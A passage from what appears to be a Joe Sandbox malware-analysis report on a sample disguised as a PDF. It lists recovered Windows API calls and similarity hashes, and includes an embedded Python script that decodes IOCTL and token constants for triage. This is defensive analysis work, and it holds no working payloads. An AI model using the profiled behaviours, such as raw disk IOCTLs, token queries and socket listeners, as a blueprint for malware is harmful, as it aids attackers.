                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00398AF2
                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00398AFF
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00398B16
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastacceptselect
                                                    • String ID:
                                                    • API String ID: 385091864-0
                                                    • Opcode ID: 68dfeff96268988cb657a1680633054796856cd6ea4db1a6994c2a9135eb29b4
                                                    • Instruction ID: 0785721bb65bd64c30ae21b619b3872e7c230ff923aa4cd99982a26adf16308a
                                                    • Opcode Fuzzy Hash: 68dfeff96268988cb657a1680633054796856cd6ea4db1a6994c2a9135eb29b4
                                                    • Instruction Fuzzy Hash: B5217871A001249FC7129F69CC85E9EBBFCEF4A350F04416AF84ADB251DB74DA458F90
                                                    APIs
                                                      • Part of subcall function 00381E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00380ABB,?,?,?,0038187A,00000000,000000EF,00000119,?,?), ref: 00381E77
                                                      • Part of subcall function 00381E68: lstrcpyW.KERNEL32(00000000,?,?,00380ABB,?,?,?,0038187A,00000000,000000EF,00000119,?,?,00000000), ref: 00381E9D
                                                      • Part of subcall function 00381E68: lstrcmpiW.KERNEL32(00000000,?,00380ABB,?,?,?,0038187A,00000000,000000EF,00000119,?,?), ref: 00381ECE
                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0038187A,00000000,000000EF,00000119,?,?,00000000), ref: 00380AD4
                                                    • lstrcpyW.KERNEL32(00000000,?,?,0038187A,00000000,000000EF,00000119,?,?,00000000), ref: 00380AFA
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0038187A,00000000,000000EF,00000119,?,?,00000000), ref: 00380B2E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen
                                                    • String ID: cdecl
                                                    • API String ID: 4031866154-3896280584
                                                    • Opcode ID: 0602ebbd60bb34137f51de7fac14ea3bda7f5b14ebeb6395298129d1792ebcf0
                                                    • Instruction ID: 89fded50bb46eedaa72d47453be115be2f8e1a0d8d8b6c06631e3f02e9c1fccd
                                                    • Opcode Fuzzy Hash: 0602ebbd60bb34137f51de7fac14ea3bda7f5b14ebeb6395298129d1792ebcf0
                                                    • Instruction Fuzzy Hash: 2911AF36200305AFDB27AF64D805D7A77A8FF45314F8140AAF806CB260EB71E845C7A0
                                                    APIs
                                                    • _free.LIBCMT ref: 00372FB5
                                                      • Part of subcall function 0036395C: __FF_MSGBANNER.LIBCMT ref: 00363973
                                                      • Part of subcall function 0036395C: __NMSG_WRITE.LIBCMT ref: 0036397A
                                                      • Part of subcall function 0036395C: RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,00000001,00000000,?,?,0035F507,?,0000000E), ref: 0036399F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free
                                                    • String ID:
                                                    • API String ID: 614378929-0
                                                    • Opcode ID: bad1a5115ac50e0ef39aca781ef98f75cce9434ee3deb56e7ca51cf43213dc02
                                                    • Instruction ID: c1c7081c68ee90ec89388b94ea781ecb7ea090d4d4a4746372509d925968061c
                                                    • Opcode Fuzzy Hash: bad1a5115ac50e0ef39aca781ef98f75cce9434ee3deb56e7ca51cf43213dc02
                                                    • Instruction Fuzzy Hash: 67110632409216ABCB333B74AC4466A3BA8AF04364F21C825F84EDE165DB39C940AB90
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003805AC
                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003805C7
                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003805DD
                                                    • FreeLibrary.KERNEL32(?), ref: 00380632
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                    • String ID:
                                                    • API String ID: 3137044355-0
                                                    • Opcode ID: f66648ba8498cfd7ae89ae221226b0b5437b081239853ff73747c572fa268138
                                                    • Instruction ID: 41f9e70c78f9979afcca4079f102ae8b8c9400c7ae8e3f17a6cb7a501362882f
                                                    • Opcode Fuzzy Hash: f66648ba8498cfd7ae89ae221226b0b5437b081239853ff73747c572fa268138
                                                    • Instruction Fuzzy Hash: 82218471900709EFEB66AF91DC88EDABBBCEF40700F0084A9E51696450E774EA59DF50
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00386733
                                                    • _memset.LIBCMT ref: 00386754
                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003867A6
                                                    • CloseHandle.KERNEL32(00000000), ref: 003867AF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                    • String ID:
                                                    • API String ID: 1157408455-0
                                                    • Opcode ID: 6c4b388054425cb1455d6d18b2562152a67d995b5c9b3ed0ab3432ae124f7e6c
                                                    • Instruction ID: dd8dc200338287885e73b07345b88c9208451cf3297bd22a8bd4afe4551fd8b3
                                                    • Opcode Fuzzy Hash: 6c4b388054425cb1455d6d18b2562152a67d995b5c9b3ed0ab3432ae124f7e6c
                                                    • Instruction Fuzzy Hash: EC11CA759012287AE72167A5AC4EFABBABCEF44764F1041EAF504E71D0D2745F808BA4
                                                    APIs
                                                      • Part of subcall function 0037AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0037AA79
                                                      • Part of subcall function 0037AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0037AA83
                                                      • Part of subcall function 0037AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0037AA92
                                                      • Part of subcall function 0037AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0037AA99
                                                      • Part of subcall function 0037AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0037AAAF
                                                    • GetLengthSid.ADVAPI32(?,00000000,0037ADE4,?,?), ref: 0037B21B
                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0037B227
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0037B22E
                                                    • CopySid.ADVAPI32(?,00000000,?), ref: 0037B247
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                    • String ID:
                                                    • API String ID: 4217664535-0
                                                    • Opcode ID: 58772ec42805bd110c7503656c89539b0c48cf5aad2c34b13b004dd5d4e2f088
                                                    • Instruction ID: a6ad6a0e6b15bcfd8315bee66c9b8d2344ef544dc5d9c6af6f59b194cdee17f7
                                                    • Opcode Fuzzy Hash: 58772ec42805bd110c7503656c89539b0c48cf5aad2c34b13b004dd5d4e2f088
                                                    • Instruction Fuzzy Hash: F211BC71A01205AFCB269F98CC84FAEB7BDEF84304F14846DE94AD7211D739AE44CB10
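The two function entries above are the ones in this stretch of the listing where a raw constant, not the API name, tells the analyst what the code does: DeviceIoControl with control code 0004D02C on a handle opened with access C0000000 and OPEN_EXISTING, and GetTokenInformation with information class 00000002. The following Python is an added example, not Joe Sandbox code, that parses "APIs" lines in the shape printed above (the line grammar is inferred from this listing and is an assumption), then decodes those constants using the CTL_CODE layout from winioctl.h and the TOKEN_INFORMATION_CLASS and GENERIC_* values from winnt.h: 0x4D02C is IOCTL_ATA_PASS_THROUGH (device type 4 FILE_DEVICE_CONTROLLER, function 0x40B, METHOD_BUFFERED, read and write access), class 2 is TokenGroups, and 0xC0000000 is GENERIC_READ|GENERIC_WRITE. The sample lines are copied from this report; the framing lines are there so the parser is shown skipping non-API text.

```python
"""Parser for the "APIs" lines of a Joe Sandbox function listing, plus decoders
for the constants that matter when triaging them. Added example; this is not
Joe Sandbox code, and the line grammar below is inferred from the listing."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: four lines copied in the shape the report prints them,
# framed by two non-API lines that the parser must skip.
SAMPLE = """\
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00386733
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003867A6
• GetForegroundWindow.USER32 ref: 003A7CB9
  • Part of subcall function 0037AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0037AA79
Memory Dump Source
"""

# "<bullet> [Part of subcall function XXXXXXXX: ]Api.MODULE[(args)], ref: XXXXXXXX"
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                        # int for hex constants, None for '?', str for literals
    ref: int                          # address of the call site in the dump
    subcall_of: Optional[int] = None  # set when the line describes a callee's behaviour


def _parse_args(raw: Optional[str]) -> list:
    if raw is None or not raw.strip():
        return []
    out = []
    for tok in raw.split(","):
        tok = tok.strip()
        if tok in ("", "?"):
            out.append(None)                 # value not recoverable statically
        elif re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
            out.append(int(tok, 16))
        else:
            out.append(tok)                  # inline string literal such as "cdecl"
    return out


def parse_api_lines(text: str) -> list:
    """Return one ApiCall per bullet line; every other report line is skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            calls.append(ApiCall(
                api=m["api"], module=m["mod"], args=_parse_args(m["args"]),
                ref=int(m["ref"], 16),
                subcall_of=int(m["sub"], 16) if m["sub"] else None))
    return calls


# CTL_CODE layout from winioctl.h: bits 31..16 device type, 15..14 required
# access, 13..2 function number, 1..0 buffering method.
DEVICE_TYPES = {0x04: "FILE_DEVICE_CONTROLLER", 0x07: "FILE_DEVICE_DISK",
                0x09: "FILE_DEVICE_FILE_SYSTEM", 0x12: "FILE_DEVICE_NETWORK",
                0x2D: "FILE_DEVICE_MASS_STORAGE"}
METHODS = ("METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER")
KNOWN_IOCTLS = {0x0004D02C: "IOCTL_ATA_PASS_THROUGH"}   # ntddscsi.h
GENERIC_FLAGS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                 0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
TOKEN_INFO_CLASS = {1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges",
                    4: "TokenOwner", 18: "TokenElevationType", 20: "TokenElevation",
                    25: "TokenIntegrityLevel"}


def decode_ioctl(code: int) -> dict:
    return {"device_type": (code >> 16) & 0xFFFF,
            "access": (code >> 14) & 0x3,
            "function": (code >> 2) & 0xFFF,
            "method": METHODS[code & 0x3],
            "name": KNOWN_IOCTLS.get(code, "unknown")}


def decode_access(mask: int) -> list:
    return [name for bit, name in GENERIC_FLAGS.items() if mask & bit]


def annotate(call: ApiCall) -> str:
    """One-line reading of the decodable constant in a call, if it has one."""
    arg1 = call.args[1] if len(call.args) > 1 else None
    if call.api == "CreateFileW" and isinstance(arg1, int):
        return f"CreateFileW access={'|'.join(decode_access(arg1))}"
    if call.api == "DeviceIoControl" and isinstance(arg1, int):
        d = decode_ioctl(arg1)
        dev = DEVICE_TYPES.get(d["device_type"], hex(d["device_type"]))
        return f"DeviceIoControl {d['name']} dev={dev} fn={d['function']:#x} {d['method']}"
    if call.api == "GetTokenInformation" and isinstance(arg1, int):
        return f"GetTokenInformation class={TOKEN_INFO_CLASS.get(arg1, arg1)}"
    return f"{call.api} (no decodable constant)"


if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE):
        print(f"{c.ref:08X} {annotate(c)}")
```

Run against the whole "APIs" section of a report instead of SAMPLE and the output is a flat list of call sites with the constants resolved, which is the quickest way to separate runtime-library housekeeping from the calls worth opening in the dump. Unknown control codes still come back with their device type, function number and method split out, so a code the table does not know can be looked up in the matching DDK header.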
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0037B498
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0037B4AA
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0037B4C0
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0037B4DB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: c02d6b2f9d8a2f9663eff918c7384b0e2390215488af724371bf25ebbc5d90ba
                                                    • Instruction ID: 23c9468dc8065a1042317240ae6c4f233c6ea7875f2487c0ce0918beb95d6695
                                                    • Opcode Fuzzy Hash: c02d6b2f9d8a2f9663eff918c7384b0e2390215488af724371bf25ebbc5d90ba
                                                    • Instruction Fuzzy Hash: 0611187A900218FFDB21DFA9C985F9DBBB8FB08710F208091E604B7295D771AE11DB94
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0035B5A5
                                                    • GetClientRect.USER32(?,?), ref: 003BE69A
                                                    • GetCursorPos.USER32(?), ref: 003BE6A4
                                                    • ScreenToClient.USER32(?,?), ref: 003BE6AF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 4127811313-0
                                                    • Opcode ID: a12d916a70fabac065edd8ffeb87ee12c0bd74325b31f77aa71fdac64ec954af
                                                    • Instruction ID: b8a12abddfd131a7208d2fe8a85a83aeafc36047570838387b2b6c948662e1f2
                                                    • Opcode Fuzzy Hash: a12d916a70fabac065edd8ffeb87ee12c0bd74325b31f77aa71fdac64ec954af
                                                    • Instruction Fuzzy Hash: 20113631900029BBCB16DF98CC45DEEB7B8EB0A305F500865F902E7150E334BA95CBA5
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00387352
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00387385
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0038739B
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003873A2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 2880819207-0
                                                    • Opcode ID: bcea54f14fc1bf8cab4b56f16cb395acf0b46a71998371d7bf7f9b6c46c8a295
                                                    • Instruction ID: 26337d553186dc324c353fcd47771e4612f386e0b51649c54035ace722d4c541
                                                    • Opcode Fuzzy Hash: bcea54f14fc1bf8cab4b56f16cb395acf0b46a71998371d7bf7f9b6c46c8a295
                                                    • Instruction Fuzzy Hash: 6911E576A04304AFC7029F689C09E9E7FAE9B45311F1442B9F825E3251D7B0D90097A5
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0035D1BA
                                                    • GetStockObject.GDI32(00000011), ref: 0035D1CE
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0035D1D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CreateMessageObjectSendStockWindow
                                                    • String ID:
                                                    • API String ID: 3970641297-0
                                                    • Opcode ID: fafb54190b632c3612ab66c6cd48efbf6ddc607108033aa71c5e4c6e27329cc9
                                                    • Instruction ID: 25b15e5744f82d4dd2b7290c8c5dc1c954ac9f6480d8d8801c3bb516b0864dcc
                                                    • Opcode Fuzzy Hash: fafb54190b632c3612ab66c6cd48efbf6ddc607108033aa71c5e4c6e27329cc9
                                                    • Instruction Fuzzy Hash: AA118B72101909BFEB638F949C50EEABB6DFF08365F050115FE1596060C732EE609BA0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                    • Instruction ID: 404711c64041113a05f0df244bc4858b2169913666dcbcec76b633ae58495a60
                                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                    • Instruction Fuzzy Hash: DF014E3600014ABBCF275E84DC018EE3F26BB18360B598455FA1C59431D33ADAB1AB81
                                                    APIs
                                                      • Part of subcall function 00367A0D: __getptd_noexit.LIBCMT ref: 00367A0E
                                                    • __lock.LIBCMT ref: 0036748F
                                                    • InterlockedDecrement.KERNEL32(?), ref: 003674AC
                                                    • _free.LIBCMT ref: 003674BF
                                                    • InterlockedIncrement.KERNEL32(00C62698), ref: 003674D7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                    • String ID:
                                                    • API String ID: 2704283638-0
                                                    • Opcode ID: 2185e8ab6bc85691214bbc41e081a574609488d5be9d8fc808d3f4093471f19b
                                                    • Instruction ID: fd798b09a5f5189161a0ce823e0afdc5e057d1c86bed723cf7ee4ad2560d2f21
                                                    • Opcode Fuzzy Hash: 2185e8ab6bc85691214bbc41e081a574609488d5be9d8fc808d3f4093471f19b
                                                    • Instruction Fuzzy Hash: 5C01F976909A119BC713AF66940E76DBB60BF05718F56C00AF418AB688CF34A941CFC2
                                                    APIs
                                                      • Part of subcall function 0035AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0035AFE3
                                                      • Part of subcall function 0035AF83: SelectObject.GDI32(?,00000000), ref: 0035AFF2
                                                      • Part of subcall function 0035AF83: BeginPath.GDI32(?), ref: 0035B009
                                                      • Part of subcall function 0035AF83: SelectObject.GDI32(?,00000000), ref: 0035B033
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003AEA8E
                                                    • LineTo.GDI32(00000000,?,?), ref: 003AEA9B
                                                    • EndPath.GDI32(00000000), ref: 003AEAAB
                                                    • StrokePath.GDI32(00000000), ref: 003AEAB9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                    • String ID:
                                                    • API String ID: 1539411459-0
                                                    • Opcode ID: a86f531335dbda1fbd5a5dbe206fe138735bcd68e9eb675d204f1de602c49fa5
                                                    • Instruction ID: 6b19b16d04e33961360f21b90b21ef4c7174a401c65040557e29038e6f5b49c7
                                                    • Opcode Fuzzy Hash: a86f531335dbda1fbd5a5dbe206fe138735bcd68e9eb675d204f1de602c49fa5
                                                    • Instruction Fuzzy Hash: F7F08232005269BBDB139F98AD0DFCE3F59AF06311F084211FE11A50F187756561DB99
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0037C84A
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0037C85D
                                                    • GetCurrentThreadId.KERNEL32 ref: 0037C864
                                                    • AttachThreadInput.USER32(00000000), ref: 0037C86B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
